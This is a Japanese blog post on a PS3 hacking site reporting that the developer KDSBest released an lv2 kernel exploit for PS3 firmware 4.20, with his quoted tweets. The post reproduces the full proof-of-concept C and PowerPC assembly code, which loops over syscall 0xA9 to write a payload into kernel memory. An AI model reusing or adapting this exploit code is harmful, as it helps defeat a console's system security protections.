ホーム   »  スポンサー広告  »  スポンサーサイト   »  PS3 Hack  »  KDSBest氏 PS3 4.20のlv2_exploitを公開

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

KDSBest氏 PS3 4.20のlv2_exploitを公開

PS3 Hack


サイト更新は停止しました。m(_ _)m

KDSBest氏 PS3 4.20のlv2_exploitを公開

http://gamegaz.com/201209239485/

PS3Crunchで、KDSBest氏がPS3の4.20で動作するlv2のexploitを公開したことを伝えていました。

先日naehrwert氏がPS3のlv2に脆弱性を発見しましたが、空きエリアを0xABADCAFEで埋めてしまい結果としてペイロードを破壊してしまうなどの問題があり、exploitとして活用できる状況には至ってませんでした。

KDSBest氏はSPU Emulationなどを開発したPS3シーンでは著名な開発者です。そのKDSBest氏はnaehrwert氏とは別にlv2 exploitを発見していたようで、当然naehrwert氏が行き詰まった問題もクリアしていたようです。

Since @ posted an lv2 exploit I will do so too ;). The stack pointer points to lv2 and if we do a (cont) http://t.co/9Te49sWB
@KDSBest
KDSBest

@naehrwertがlv2 exploit公開したので俺もするよ。スタックポインターがlv2を…(以下TwitLongerに続く)

I didn't managed to make it work on 4.21 so I just did on 4.20 ;)
@KDSBest
KDSBest

まだ4.21で動くようになってない。今のところ4.20だけで。

@ it's funny I found the exploit some days ago on my own and I've been working on an exploit for some days. ;)
@KDSBest
KDSBest

ちょっと前に自分でこのexploit見つけて、しばらくずっとやってた。

現時点ではサンプルコードが公開されているだけでエンドユーザーが直接享受できるようなものではありませんが、コードが公開されたことでPS3シーンに変化が現れるかもしれません。

Code:

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

register unsigned long long payloadHolder2 asm (“r21″);
register unsigned long long payloadHolder asm (“r20″);
register unsigned long long stackpointer asm (“r1″);
register unsigned long long counter asm (“r25″);
register unsigned long long bufferStackpointer asm (“r26″);

int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;

payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;

// Incrementer
counter = 0×00;

// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall

asm(“li %r0, 0×0″);
asm(“li %r3, 0×6″);
asm(“li %r4, 0×1″);
// li r11, 0x24F -> PANIC
asm(“mr %r22, %r20″);
asm(“mr %r23, %r20″);
asm(“mr %r24, %r20″);
asm(“mr %r27, %r20″);
asm(“mr %r28, %r20″);
asm(“mr %r29, %r20″);
asm(“mr %r30, %r20″);
asm(“mr %r31, %r20″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

// We write sc
asm(“mr %r22, %r21″);
asm(“mr %r23, %r21″);
asm(“mr %r24, %r21″);
asm(“mr %r27, %r21″);
asm(“mr %r28, %r21″);
asm(“mr %r29, %r21″);
asm(“mr %r30, %r21″);
asm(“mr %r31, %r21″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

if(counter < 0x1000000)
goto doItAgain;

stackpointer = bufferStackpointer;
return 0;
}

関連記事
ブログパーツ
コメント
トラックバック
トラックバック URL
コメント
管理者にだけ表示を許可する
アクセスカウンター
検索フォーム
商品検索
サイト内検索
プロフィール


管理人:tomoki
ページランク
にほんブログ村 ゲームブログへ にほんブログ村 ゲームブログ ゲーム分解・改造へ にほんブログ村 ゲームブログ ゲーム情報へ にほんブログ村 音楽ブログ 音楽ダウンロードへ
Skype : tomoki122263
Twitter 本垢 :
Twitterブログ : iroiroblog
本垢と同じにしました。
My Twitter
Follow me
PSP改造
電動ガン・次世代ガン
動画
顔文字ボタン


トータルアクセスカウンター
ランキング
最新記事
PlayStation Vitaシステムソフトウェア
げん玉

■げん玉
下準備
げん玉とは?
ポイントの森
お友達紹介
ポイント交換方法
相互リンク
リンク